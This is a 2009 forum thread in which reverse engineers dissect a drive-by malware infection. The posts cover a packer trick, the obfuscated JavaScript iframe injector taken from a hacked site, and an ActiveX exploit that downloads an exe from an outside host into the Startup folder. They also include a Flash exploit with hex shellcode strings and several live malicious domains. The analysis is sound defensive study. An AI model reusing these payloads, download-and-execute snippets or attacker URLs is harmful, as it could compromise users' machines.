Log in

View Full Version : fun malware cryptor ~;

evaluator
February 1st, 2009, 06:51
from http://www.offensivecomputing.net/?q=blog/11595

it does fun call second time to new_EIP from KERNEL32.dll
good trick, static analysis will fail.
also new is: it unmaps self_mapview & again allocates memory at Base_address. OEP will start in new theard.

Kayaker, you will click on logo_hearts! so niiiiiiiceee..
http://store.worldnewsdot.com/

passw: malware
Kayaker
February 2nd, 2009, 02:31
Quote:
[Originally Posted by evaluator]
Kayaker, you will click on logo_hearts! so niiiiiiiceee..


Aaaahh, how sweet..

Youandme.exe. Keeps changing its name. Looks like the fake Obama site has disappeared too.


OK, I've got one for you Eval-Unpucks-In-Sleep-uator.


I've never seen this before either. A funky bit of code which manipulates offsets and memory addresses to directly jump to a CALL ECX instruction in ntdll. The value of ECX is set to an address in the 40xxxx range.


At the start of the malware an SEH is set (at 4010F9) and an invalid instruction is run which triggers the SEH. In the SEH you quickly reach the instruction:

Code:


:00401146 FF E0        jmp     eax


EAX at this point has been adjusted to be 7C9037BD, and ECX is 401888.

Therefore the JMP EAX directly calls the following instruction in ntdll, with the CALL ECX offset being 401888:


Code:


:u eax (Softice)

:7C9037BD  FFD1                CALL      ECX    ; 401888

:7C9037BF  648B2500000000      MOV       ESP,FS:[00000000]

:7C9037C6  648F0500000000      POP       DWORD PTR FS:[00000000]

:7C9037CD  8BE5                MOV       ESP,EBP

:7C9037CF  5D                  POP       EBP

:7C9037D0  C21400              RET       0014



That CALL ECX is part of the larger ntdll function ExecuteHandler2:

Code:


:7C903799 ExecuteHandler2@20 proc near            ; CODE XREF: ExecuteHandler@20+1F

:7C903799

:7C903799 arg_0           = dword ptr  8

:7C903799 arg_4           = dword ptr  0Ch

:7C903799 arg_8           = dword ptr  10h

:7C903799 arg_C           = dword ptr  14h

:7C903799 arg_10          = dword ptr  18h

:7C903799

:7C903799                 push    ebp

:7C90379A                 mov     ebp, esp

:7C90379C                 push    [ebp+arg_4]

:7C90379F                 push    edx

:7C9037A0                 push    large dword ptr fs:0

:7C9037A7                 mov     large fs:0, esp

:7C9037AE                 push    [ebp+arg_C]

:7C9037B1                 push    [ebp+arg_8]

:7C9037B4                 push    [ebp+arg_4]

:7C9037B7                 push    [ebp+arg_0]

:7C9037BA                 mov     ecx, [ebp+arg_10]

:7C9037BD                 call    ecx

:7C9037BF                 mov     esp, large fs:0

:7C9037C6                 pop     large dword ptr fs:0

:7C9037CD                 mov     esp, ebp

:7C9037CF                 pop     ebp

:7C9037D0                 retn    14h

:7C9037D0 ExecuteHandler2@20 endp



Sure enough this works. Even though the execution path goes from 401146 to the middle of an ntdll function (which immediately Calls to 401888), the ntdll function does eventually return with all the correct stack back into 40xxxx, and things continue on their merry way.



Here's the story behind the malware. I was browsing around, with Opera, and hit on an sql injected website which had an Iframe exploit embedded in it.

Suddenly ZoneAlarm warned me of some exe wanting to run within svchost.exe, and do I want to allow it? Duh. No. Turns out it had already modified my registry, but I was able to catch everything it had done before there was any permanent damage.


The exe file runs from "C:\Documents and Settings\MYOB\Local Settings\Temp\wJQs.exe" and copies itself to %windir%/digeste.dll.

The exe and dll file are identical except for the PE.Characteristics byte.

It modifies the key (the first 4 entries in the list are OK)

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SecurityProviders]
"SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digeste.dll"


That's it. Search around for "digeste.dll" for further info.



To debug the Iframe javascript I dumped it (from the source of the site page I had browsed to) into a blank html file. I then added a window.alert popup box command to display the decoded Iframe, as well as a document.writeln command to display the Math.random result.

I know there are plugins and such to decode JS, but this direct method was just as easy. There were actually 2 JS instances, both almost identical, so I only include one.

Here is the Iframe exploit. If you wish to run it, it will simply display a message box with the decoded Iframe, then the random number in the html page. And of course it will attempt to connect to http://7speed.info, but I don't believe the site exists any longer, but do disconnect from the net if you like.


Code:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<title>Untitled Document</title>

</head>



<body>



<script language=JavaScript> 



function uawebnb25(z)

{

	var c=z.length;

	var m=1024;

	var i,s,h,b=0;

	var w=0,x=0;

	

	var d=Array(63,49,23,17,58,10,32,61,12,50,0,0,0,0,0,0,29,35,39,56,27,14,36,47,55,53,54,38,57,20,7,18,37, 60,6,13,9,45,40,5,52,11,34,0,0,0,0,28,0,26,15,33,41,30,44,24,42,25,3,2,43,4,51,21,46,1,16,48,62,59,2 2,8,31,19,0);	

	

	for(s=Math.ceil(c/m); s>0; s--)

	{

		h='';

		

		for(i=Math.min(c,m); i>0; i--,c--)

		{

			{

				x|=(d[z.charCodeAt(b++)-48])<<w;

			

				if(w)

				{

					h+=String.fromCharCode(231^x&255);								

					x>>=8;

					w-=2

				}else{			

					w=6				

				}

			}

		}

		

		

// START DEBUGGING



//document.writeln("h = " + h + "<br>";	// h = window.status='Done';document.write('')



window.alert(h);

	

// window.status='Done';document.write('<iframe name=356159 

// src="http://7speed.info/t/?'+Math.round(Math.random()*29463)+'356159'+'" 

// width=427 height=69 style="display:none"></iframe>')





var x;

x = Math.round(Math.random()*29463)+'356159'; 	

document.writeln("x = " + x + "<br>";	



// x = 10906356159; x = 677356159, etc.

			

// END DEBUGGING





		eval(h);			

	}	

}



uawebnb25('r4gZjZwFTyLFREdFMhSsAZgZkk8HjZwcOhV6TEi9rvdAy5CnzGUAqvdc55C1TaVZkhSIONUIOu71MvTca2QAyELP@ A89ryLPk5C6TugZqZw9yZ8JznfhRELAT2TZOKC6blhcytg9oagZjZVZbu_nou7X3yUn8j8IONUIOuSs8j_1NjdAjELAab@IrxQAk 4w6bEdJ3u71MEdBY5VJWbVAMeLZR4iHTZgZkv_JDAfAqvdc55gJzu8')



</script>



</body>

</html>




The attachment contains the exe, dll and the above html file renamed as *.txt


Password: malware
evaluator
February 2nd, 2009, 04:43
i unpacked it for you (forgot to ask, if you need..)

please, explain me, i also mostly use Opera
& so i can be infected by Opera? (should we notify Opera team?)
Kayaker
February 2nd, 2009, 13:34
Quote:
[Originally Posted by evaluator;79085]i also mostly use Opera
& so i can be infected by Opera?


Apparently. By this type of Iframe attack at least. To be honest, I was surprised too, not really knowing exactly how these things worked. I suppose using Opera will protect you from the IE/ActiveX based attacks, but somehow that exploit allowed not only a download, but to run the executable as well.


I had done a bit of research afterwards and figured the web site had been compromised by MPack (or similar)

http://en.wikipedia.org/wiki/MPack_(software)

They interviewed one of the MPack authors and his suggestion was:

Quote:
I would advise you to use the Opera browser with scripts and plug-ins disabled in order not to be caught by the MPack someday.


http://www.securityfocus.com/news/11476?ref=oc
evaluator
February 2nd, 2009, 16:22
yaa.. i mostly like without jscript, but 80% sites requires you jscript..
Kayaker
February 3rd, 2009, 03:35
For interest, here's what the rest of that http://7speed.info Iframe exploit does. The specific details were probably a bit different from what I encountered, but it's probably pretty close.


http://drupal.org/node/356093#comment-1189521

Quote:


Right after the body tag you have the following snippet of code:

Code:


<script language=JavaScript>function ttbnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,48,16,4,32,56,33,28,35,40,0,0,0,0,0,0,42,18,39,0,1,46 ,55,62,3,29,34,25,59,38,23,36,43,11,12,24,30,19,37,57,53,31,13,0,0,0,0,8,0,52,21,58,60,15,17,14,61,5 4,49,45,22,6,10,26,47,5,50,41,2,9,7,27,51,20,44);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(148^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}ttbnb25('8FpG1p05cTg5XHT5BBcz2ppGjeLP1p0h6BYdcHEE8wT04vepxJo0rwThWvekcNYGjBo 9jHc9konkBwGhsoQ04HgWEELE8TgWjvedcipGrp0E4pL@xGwiXHg0coGG6PeddMIh4xpEMNpG1pYGdiPpVgnPOrop0gw9jHc9koc z0gPkagT01Hg0soosMAQ0jF0ddHT@ztnkBHTL5vY@itY0BUgGXFEPcppGjwP@9Ew0rwThWvp@xiQ')</script><!-- hiddenmesa.com -->


It decodes to:

Code:


window.status='Done';document.write('<iframe name=5e4792 src="http://7speed.info/t/?'+Math.round(Math.random()*17808)+'5e4792'+'" width=212 height=84 style="display:none"></iframe>')


Which fetches the attack vectors from 7speed.info via a number of iframes:

Code:


<iframe src=http://mysexydreams.net/img/stat/jam.php width=1 height=1 style="display:none"></iframe>

<iframe src=http://209.160.67.56/va.php width=1 height=1 style="display:none"></iframe>

<iframe src=http://ffseik.com/sss/in.cgi?14 width=1 height=1 style="display:none"></iframe>


va.php fetches:

Code:


<iframe src=http://papampam.net/in.cgi?pipka2 width=1 height=1 style="display:none"></iframe>


and this fetches:

Code:


<object classid="clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id="attack"></object>

<script>

var arbitrary_file = "http://portulote.com/cache/load.php";

var destination = 'c:/Documents and Settings/All Users/Start Menu/Programs/StartUp/browsers.exe';

attack.SnapshotPath = arbitrary_file;

attack.CompressedPath = destination;

attack.PrintSnapshot(arbitrary_file,destination);

</script>



<embed src="pdf.php" type="application/pdf" width=100 height=100></embed>

evaluator
February 3rd, 2009, 09:33
good. next time, if you'll browse mal_sites, turn on packet capture..

passw is yo'r name
Kayaker
February 3rd, 2009, 10:40
Actually I just found my notes. The hacked website was (and still is!)

WARNING WARNING - INFECTED SITE

www thehumblest net

WARNING WARNING - INFECTED SITE

It's still infected with the exploit, though it's slightly different now and there's only 1 instance. The Iframe now translates to:

Code:


window.status='Done';document.write('<iframe name=2920bf

src="http://7speed.info/t/?'+Math.round(Math.random()*28210)+'2920bf'+'"

width=403 height=70 style="display:none"></iframe>')



I checked it with Javascript disabled, not sure if it still connects, but like I said the script has been changed since I went there Jan 6. It was actually a Google cache of the site I browsed to, but that's obviously no protection.

The site itself is innocent. Was going to warn the author but couldn't find an email. I had just read an odd old SciFi novel by Jack Vance, Tales of Dying Earth, and there was a review on that site. (See, I wasn't chasing pr0n sites )

I'm not quite ready to tackle it with Wireshark and JS enabled...would need to set up a VM first.

Any suggestions by the experts on how best to safely analyze such a site and to decode the steps that would occur while your system is being compromised?


Thanks for the pw of your unpacked file attachment btw, I hadn't gotten completely around to dumping it.
evaluator
February 3rd, 2009, 15:10
i did go there, but it finishes with thisredirection:

http://podsmotrim.net/log/404.php

edit:
Code:


<A HREF="http://8speed.info/t/?48804c97d9" target=_blank>8speed.info/t/?48804c97d9</A><BR>

<A HREF="http://8speed.info/t/?206014b22" target=_blank>8speed.info/t/?206014b22</A><BR>

<A HREF="http://sexbases.cn/sexy.html" target=_blank>sexbases.cn/sexy.html</A><BR>

<A HREF="http://sexbases.cn/v.php" target=_blank>sexbases.cn/v.php</A><BR>

<A HREF="http://podsmotrim.net/log/new.php" target=_blank>podsmotrim.net/log/new.php</A><BR>

<A HREF="http://vienmoreter.com/pages.html" target=_blank>vienmoreter.com/pages.html</A><BR>

<A HREF="http://vienmoreter.com/cache/" target=_blank>vienmoreter.com/cache/</A><BR>

<A HREF="http://vienmoreter.com/kebab/info.php" target=_blank>vienmoreter.com/kebab/info.php</A><BR>

<A HREF="http://podsmotrim.net/log/flash.php" target=_blank>podsmotrim.net/log/flash.php</A><BR>

<A HREF="http://podsmotrim.net/log/404.php" target=_blank>podsmotrim.net/log/404.php</A><BR>
Kayaker
February 3rd, 2009, 16:51
Quote:

http://podsmotrim.net



Which, not surprisingly, is listed here as an abusive domain name (under "P"

http://hostexploit.com/?option=com_content&view=article&id=74&Itemid=84
Extremist
February 3rd, 2009, 23:50
evubulator is unpuc-king
Kayaker
February 4th, 2009, 02:11
Aye..

evaluator
February 4th, 2009, 03:37
hey! but i get SWF, which i ignored.
then i unpacked it (ZLB) & see there many HEX-chars. huh!?

ok, then i extracted chars & converted HEX-2-bin.
in result i get 12 SWF with same look, but with little difference.
i don't know swf decompiling, so now your move!

BtW, this possible-malicous swf can be flash-version dependant.
what version you had in janvier?
dELTA
February 5th, 2009, 06:50
Just a note about the exploits themselves that let the code into your computer to begin with, and regarding "if you can be infected in Opera"...

Most exploits today are browser independent, and instead make use of vulnerabilities in third-party extensions, out of which the most commonly exploited are Adobe Acrobat (PDF), Flash (SWF), Quicktime and Java. Thus, you're no longer safe no matter which browser you use, but must rather always keep all third-party extensions updated at all times too in order to be (at least somewhat) safe.

There are apparent traces in the output above of at least an Acrobat exploit being used, but most of the time these days the bad guys fire off a whole battery of exploits, for practically all top 20 vulnerabilities they know of or so, in order to make you trip on at least one of them, which is all they need...

Oh, and if you need help to analyze the potentially malicious SWF, maybe you should bring e.g. schizoM into the thread (I just PM:ed him about it), or some of the other SWF pros around here...
esther
February 5th, 2009, 09:10
I did use some action script decompiler trying to extract what is inside(12swf),only an image file and main timeline file,nothing else...
schizoM
February 5th, 2009, 09:23
I decompiled it
but it is very interesting..
I attached decompiled AS3

In rest of swf files, there are no interesting things.

But in opr_swf012PO are..
file is interesting because there is tag 3F 12:
3F
00111111

12
00010010

byte swapping
0001001000111111

0001001000 (10 bits) tag type = 72
I don't know what is 72 tag ?

In AS3 there should be tag type 82 like BF 14

flash 10
This table provides a quick lookup, allowing any tag in the SWF specification to be found by
its tag value.
Tag value Tag name
70 PlaceObject3
71 ImportAssets2
73 DefineFontAlignZones
74 CSMTextSettings
Tag value Tag name
273
75 DefineFont3
76 SymbolClass
77 Metadata
78 DefineScalingGrid


Moreover only Sothink decoimpiler can decompiled it...
but I must add long String myself.
I don't know how it works but I think there is bufferoverflow bug in flash player nice...
esther
February 5th, 2009, 09:44
Hi,it says file corrupted in version 4.4
thanks for the effort
dELTA
February 5th, 2009, 09:57
Thanks for taking a look schizoM.

And just to straighten things out for some other people:
If an SWF is malicious in the way that it tries to exploit your computer like this, the malicious parts will most likely not be on an Action Script or even application level, but rather on the level of SWF file format or AS bytecode (just like schizoM mentions above, it normally targets a buffer overflow vulnerability in Flash player). This in turn makes it useless to just try to decompile the file with a normal Action Script decompiler, but rather, you'd need low-level Flash knowledge and/or tools to make any useful analysis. This is exactly what schizoM has got, so that's why I asked him instead of recommending running it through an AS decompiler.
schizoM
February 5th, 2009, 10:16
Quote:
[Originally Posted by dELTA;79138]Thanks for taking a look schizoM.

And just to straighten things out for some other people:
If an SWF is malicious in the way that it tries to exploit your computer like this, the malicious parts will most likely not be on an Action Script or even application level, but rather on the level of SWF file format or AS bytecode (just like schizoM mentions above, it normally targets a buffer overflow vulnerability in Flash player). This in turn makes it useless to just try to decompile the file with a normal Action Script decompiler, but rather, you'd need low-level Flash knowledge and/or tools to make any useful analysis. This is exactly what schizoM has got, so that's why I asked him instead of recommending running it through an AS decompiler.


My SWF Reader can't read this file :/ This swf is preparely deform.
I think that Zasder is exploit class and it is in:
Code:


 ldr = new Loader();

            ldr.contentLoaderInfo.addEventListener(Event.COMPLETE, completeHandler);

            ldr.loadBytes(_loc_16);







public function completeHandler(param1:Event) : void

        {

            Lib.current.stage.addChild(ldr);

            return;

        }// end function


and var _loc_1:String , var _loc_1:String , etc are shellcode.
Bug is in Lib.current.stage.addChild.
Maybe someone know what this shellcode do.
schizoM
February 5th, 2009, 10:18
Quote:
[Originally Posted by esther;79137]Hi,it says file corrupted in version 4.4
thanks for the effort


You have cracked version of Sothink Decompiler
Someone remove swf header so, I must add new header. I think that someone remove header when try unpack file.
esther
February 5th, 2009, 10:46
tbh I'm fairly new in swf stuff,it does able to decompile lena's stuff(testing purposes),maybe its the obusfication of the file I really don't know anyway thanks for the file
evaluator
February 5th, 2009, 12:25
>>Someone remove swf header so, I must add new header.

heeey!
i said, i unpacked it as zlib. here origin swf, if u wanna itt
schizoM
February 5th, 2009, 12:58
and You remove header

If someone want decompile this file should use Sothink Decompiler 4.5 other decompilers like asv6 or Eltima can't decompile this file.

I add p-code, raw (bytecode) from Sothink.

I have not time for analyse this swf now (must learn to exams)
evaluator
February 5th, 2009, 13:42
no i not removed..

when you decompress ZLIB stream, it will without header.
schizoM
February 5th, 2009, 16:12
I understand You but...
You use ZLIB decompressor so You remove SWF header by software
ZLIB decompressor remove 8 bytes from swf

You should use swf decompressor or add 8 bytes after decompressing lol
schizoM
February 5th, 2009, 20:45
I think it can help You to understand this exploit:
http://www.matasano.com/log/1032/this-new-vulnerability-dowds-inhuman-flash-exploit/ ("http://www.matasano.com/log/1032/this-new-vulnerability-dowds-inhuman-flash-exploit/")
esther
February 5th, 2009, 23:14
lol,I didn't use ZLIB,I'm using hexeditor,ollydbg copy and paste get the shit you have on swf12
evaluator
February 6th, 2009, 04:08
ok, enuf smiles.;
schizoM, is something intresting in that little decoded SWFs?
dELTA
February 6th, 2009, 05:10
Eval, I'd say schizoM pretty much already found everything interesting that can be found on the SWF level with this file. Now we're back at the x86 level, and that means it's your turn...

If you check out the "raw.txt" that schizoM attached above, you will find the following sequence, which is most likely the buffer overflow code (and thus really x86 code in some form, i.e. inside the "_as3_pushstring" data):
Code:
_as3_pushstring "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513FC57827DEADFF6 7573821C12551D4AB55E20F86B68556E93CF5D71496916854753045F052AE712ED8C28084362A5F02C5EAC98F9A8A35E182A 90BAC4F02C0DF41511AA0AA1C2CCBFE5176E6FB340BC106E7D8E9CE83B9B3B859C67D00ABD135B14AA84C8BA502595AAF093 70DDD39F3532475EE985A5A7209F685D61F899C60A458E5330C2C69B862A677CD2D5990A657052CDADBFC004DAD8F2441F69 E35D81C48E3F666E2DB7A456417359F820F2D9977A69643AC1B8F337CC87E3E7958FB84F92B54352618165909081EC000900 0060E80E000000906181C400090000FF71ECC20400E8000000005D83C514B98B010000B03D304500454975F9EB00ADADADAD ADADADADD4C13D3D3D62599C0D3D3D3D4531B67D31B64D2190B65535D634B67D09B07D41B65501B6CA573964D5B23D3D3DDF C45552533D3D55484F515069C22BB6D5D5443D3D3DB6EA7ABD023D48C77A6A7ABD023D48C7B6D2620EF4BCD1393C3D3DB6E1 6C6F6E55393C3D3DC26B3167646C6FB63F6E7EBD063D48C7BC46C113584558483EBED635B43EFA7E3913584558FB7E353D66 B7FC390DB5783D0EFD6D6D6E6A6DC26B2DBEC53D483B573C6EC26B39BCF9293C3D3DFE073D4889C26B356C6BB64801B64913 453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF6303EE77DD6CC062248DA63B663193EE05BB63176B66321 3EE0B639B63EF8966364FED5C2C3C2C2B37333D1A5C3B73343E5DF4E0EF7B7660B27124D4A776C4E3D5549494D0712124D52 594E5052494F5450135358491251525A125A58495845580F134D554D025459000C0F0E1B3D3D3D3D0D0D0F595C0B0E045C04 5C0D0B0D0D0D0D0D0D0D0D0D0F5E0C080D0E0C040E0D0D0D0C0D090D040D0D0D0D0D0D0D0D0C0A3D3EC342C22FFF1D3D570F 65873D3EC342C22FFF193D85CD3D3D3D0BB0691939F013FF293D85283C3D3DD63885223C3D3D873D3EC342C22FFF293D6F69 5739571D6AC26B2967FE6CB6780178B6611542703EE0B62E3EE80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A 3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D 07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104 DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D554949 4D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DDCD0EAB8C29C5ED7F653B2213DC977CE6CA5 82C94105B66B6CE6A5A7D9E90CA4488F775B25340E4EC9774575784088E4CB980C4FE411E06F9C5EFBF07BEC43EAB38BD685 7285254EB5AB11678A37A815E1988AA008200000000000000000000000000000000000000000000000000000000000000000 2043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61 696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D 656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F45 76656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973 706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B070102070204070406 07050807050907060B07020C07020D07020E07020F0400000000000000000000000000000000000101020803000201030100 0100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D04900 5D04240060034F0402470000030201010927F86275F86271F8E82AFBFFFF00F82902F8637502020202020202020202020202 0202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65 775F666C612E4D61696E54696D656C696E65004000000021295F285F292A265E262524464848446B696A61657366206A666A 786620793820776F647320666177663332317335363420326331337331642033663234647365743334353933385F282A265E 54255E255E257A6A68677366206A687366206A20200000"

//80 0f 

_as3_coerce String

//d5 

_as3_setlocal <1> 

//2c 2d 

_as3_pushstring "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513C8F123283D7FAD A171C3644EBFED5DD8328C1A62A6FE57740FFC7488E90BBA92BB4A6A9EADFD438815BA094B830B21632C09D4E5B9385EAB60 16B42E4436568A0BE3F24728883C31396B4894847DB29674BB005E9EF56D04A1E89F400982EDF2E64EACF1D4464536279CF3 5BD4316EFB0FBEEC77ED8AB213AE86288B7BC51F8DA0ADC9A8BFB10D2AC9279E02EAE536929FC03112279860648591038BC2 AA0D93B3B9C22359984591B4F7209F9EB0ED4A7203A5C0AD99ABF6C9402BF2EAACDFB0B94052D1759E2965909081EC000900 0060E80E000000906181C400090000FF71ECC20400E8000000005D83C514B98B010000B03D304500454975F9EB00ADADADAD ADADADADD4C13D3D3D62599C0D3D3D3D4531B67D31B64D2190B65535D634B67D09B07D41B65501B6CA573964D5B23D3D3DDF C45552533D3D55484F515069C22BB6D5D5443D3D3DB6EA7ABD023D48C77A6A7ABD023D48C7B6D2620EF4BCD1393C3D3DB6E1 6C6F6E55393C3D3DC26B3167646C6FB63F6E7EBD063D48C7BC46C113584558483EBED635B43EFA7E3913584558FB7E353D66 B7FC390DB5783D0EFD6D6D6E6A6DC26B2DBEC53D483B573C6EC26B39BCF9293C3D3DFE073D4889C26B356C6BB64801B64913 453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF6303EE77DD6CC062248DA63B663193EE05BB63176B66321 3EE0B639B63EF8966364FED5C2C3C2C2B37333D1A5C3B73343E5DF4E0EF7B7660B27124D4A776C4E3D5549494D0712124D52 594E5052494F5450135358491251525A125A58495845580F134D554D025459000C0F0E1B3D3D3D3D0D0D0F595C0B0E045C04 5C0D0B0D0D0D0D0D0D0D0D0D0F5E0C080D0E0C040E0D0D0D0C0D090D040D0D0D0D0D0D0D0D0C0A3D3EC342C22FFF1D3D570F 65873D3EC342C22FFF193D85CD3D3D3D0BB0691939F013FF293D85283C3D3DD63885223C3D3D873D3EC342C22FFF293D6F69 5739571D6AC26B2967FE6CB6780178B6611542703EE0B62E3EE80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A 3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D 07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104 DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D554949 4D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E00003D3D3D00000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000E31D0029FC107EF8BB8F735441672895 1B4BACD4E7019CADC394A815EAAE8EA008200000000000000000000000000000000000000000000000000000000000000000 2043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61 696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D 656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F45 76656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973 706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B070102070204070406 07050807050907060B07020C07020D07020E07020F0400000000000000000000000000000000000101020803000201030100 0100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D04900 5D04240060034F0402470000030201010927F56279F56275F5E82AFBFFFF00F52902F5637902020202020202020202020202 0202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65 775F666C612E4D61696E54696D656C696E6500000000002B292928265E5E24616A7764206A68646720797277207A6B20666A 68736766206B7975617366647766647364686B6A6866397071387320646E6C6B6A6164667568727269306B64666B6A666869 756466686A6866756971383777336B786A686868310000"

//80 0f 

_as3_coerce String

//d6 

_as3_setlocal <2> 

//2c 2e 

_as3_pushstring "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513FC57827DEADFF6 7573821C12551D4AB55E20F86B68556E93CF5D71496916854753045F052AE712ED8C28084362A5F02C5EAC98F9A8A35E182A 90BAC4F02C0DF41511AA0AA1C2CCBFE5176E6FB340BC106E7D8E9CE83B9B3B859C67D00ABD135B14AA84C8BA502595AAF093 70DDD39F3532475EE985A5A7209F685D61F899C60A458E5330C2C69B862A677CD2D5990A657052CDADBFC004DAD8F2441F69 E35D81C48E3F666E2DB7A456417359F820F2D9977A69643AC1B8F337CC87E3E7958FB84F92B54352618165909081EC000900 0060E80E000000906181C400090000FF71ECC20400E8000000005D83C514B98B010000B03D304500454975F9EB00ADADADAD ADADADADD4C13D3D3D62599C0D3D3D3D4531B67D31B64D2190B65535D634B67D09B07D41B65501B6CA573964D5B23D3D3DDF C45552533D3D55484F515069C22BB6D5D5443D3D3DB6EA7ABD023D48C77A6A7ABD023D48C7B6D2620EF4BCD1393C3D3DB6E1 6C6F6E55393C3D3DC26B3167646C6FB63F6E7EBD063D48C7BC46C113584558483EBED635B43EFA7E3913584558FB7E353D66 B7FC390DB5783D0EFD6D6D6E6A6DC26B2DBEC53D483B573C6EC26B39BCF9293C3D3DFE073D4889C26B356C6BB64801B64913 453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF6303EE77DD6CC062248DA63B663193EE05BB63176B66321 3EE0B639B63EF8966364FED5C2C3C2C2B37333D1A5C3B73343E5DF4E0EF7B7660B27124D4A776C4E3D5549494D0712124D52 594E5052494F5450135358491251525A125A58495845580F134D554D025459000C0F0E1B3D3D3D3D0D0D0F595C0B0E045C04 5C0D0B0D0D0D0D0D0D0D0D0D0F5E0C080D0E0C040E0D0D0D0C0D090D040D0D0D0D0D0D0D0D0C0A3D3EC342C22FFF1D3D570F 65873D3EC342C22FFF193D85CD3D3D3D0BB0691939F013FF293D85283C3D3DD63885223C3D3D873D3EC342C22FFF293D6F69 5739571D6AC26B2967FE6CB6780178B6611542703EE0B62E3EE80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A 3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D 07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104 DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D554949 4D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DDCD0EAB8C29C5ED7F653B2213DC977CE6CA5 82C94105B66B6CE6A5A7D9E90CA4488F775B25340E4EC9774575784088E4CB980C4FE411E06F9C5EFBF07BEC43EAB38BD685 7285254EB5AB11678A37A815E1988AA008200000000000000000000000000000000000000000000000000000000000000000 2043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61 696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D 656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F45 76656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973 706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B070102070204070406 07050807050907060B07020C07020D07020E07020F0400000000000000000000000000000000000101020803000201030100 0100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D04900 5D04240060034F0402470000030201010927F86275F86271F8E82AFBFFFF00F82902F8637502020202020202020202020202 0202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65 775F666C612E4D61696E54696D656C696E6500400000002C5A586863206A68666C756573206F6677387972206B6A64207333 643566363420383735676673206572776F38657237773933323834373938333220652D3023242A282A295F2A2625495E2A26 2648474648474454524544262A2828554A484848480000"

//80 0f 

_as3_coerce String

//d7 

_as3_setlocal <3> 

//2c 2f 

